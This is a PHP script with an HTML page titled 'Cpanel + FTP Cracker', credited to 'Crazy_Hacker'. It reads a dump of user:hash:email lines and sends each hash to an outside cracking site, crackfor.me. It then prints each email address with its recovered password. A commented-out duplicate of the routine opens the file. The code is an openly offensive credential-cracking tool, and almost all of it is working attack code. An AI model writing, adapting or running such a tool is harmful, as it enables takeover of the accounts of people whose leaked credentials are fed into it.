- <?php
- /*set_time_limit(0);
- $file = file("txt.txt");
-
- function chek($exp){
- global $expl;
- global $i;
-
- $ch = curl_init("http://crackfor.me");
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Извените но я бот :)");
- $headers = array
- (
- 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8',
- 'Accept-Language: ru,en-us;q=0.7,en;q=0.3',
- 'Accept-Encoding: deflate',
- 'Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7'
- );
- curl_setopt($ch, CURLOPT_HTTPHEADER,$headers);
-
- curl_setopt($ch, CURLOPT_POSTFIELDS, 'hash='.$exp.'&act=find');
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $result = curl_exec($ch);
- preg_match('#<b>(.*)</b>#iU',$result,$res[$i]);
- print $res[$i][0]." --- ".$expl[2]."<br/>";
- curl_close($ch);
-
-
- }
- /////////////////////////////////////
- $i = 0;
- foreach($file as $pass){
- $expl = explode(":",$pass);
- $i = 0;
- chek($expl[1]);
- $i++;
- }
- echo "<pre>";
- //print_r ($res);
-
- */
-
- $file = file("basehnet.txt");
-
- $connect_timeout=5;
- set_time_limit(0);
-
-
- ?>
- <html>
- <head>
- <meta http-equiv="Content-Language" content="en-us">
- </head>
- <title>Cpanel + FTP Cracker</title>
- <body text="#00FF00" bgcolor="#000000" vlink="#008000" link="#008000" alink="#008000">
- <div align="center">
- <form method="POST" style="border: 1px solid #000000">
- <table width="67%" style="border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0">
- <tr><td align=center>
- <font face="Courier New" size=4 color=yellow>Cpanel + FTP Cracker</font>
- </td></tr>
- </table>
- <br />
- <?php
-
- function chek($exp){
- global $expl;
- global $i;
-
- $ch = curl_init("http://crackfor.me");
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Извените но я бот :)");
- $headers = array
- (
- 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8',
- 'Accept-Language: ru,en-us;q=0.7,en;q=0.3',
- 'Accept-Encoding: deflate',
- 'Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7'
- );
- curl_setopt($ch, CURLOPT_HTTPHEADER,$headers);
-
- curl_setopt($ch, CURLOPT_POSTFIELDS, 'hash='.$exp.'&act=find');
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $result = curl_exec($ch);
- preg_match('#<b>(.*)</b>#iU',$result,$res[$i]);
- $res = $res[$i][0];
- $mail = $expl[2];
-
- if ( curl_errno($ch) == 0 ){
- print "<table width='67%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'><tr><td align=center><b><font face=\"Tahoma\" color=\"#FF0000\">[+]</font><font>
- E-MAIL (</font><font color=\"#FF0000\">$mail</font><font>) and Password (</font><font color=\"#FF0000\">$res</font><font color=\"#008000\">)</font></b></td></tr></table>";}curl_close($ch);}
-
- $i = 0;
- foreach($file as $pass){
- $expl = explode(":",$pass);
- $i = 0;
- chek($expl[1]);
- $i++;
- }
-
- ?>
- <table width='67%' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>
- <tr><td align=center><form method=POST action='' align=center><br /><input type=submit name=enter value=" Enter " style='color: #FF0000; font-weight: bold; border: 1px dashed #333333; background-color: #000000' /></form></td></tr></table><br />
-
-
- <table width="67%" style="border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0">
- <tr><td align=center>
- <font face="Courier New" size=2 color=yellow>[Coded By Crazy_Hacker]<br />Copyright reserved to 0day.com (Security Lov3rz)</font>
- </td></tr>
- </table>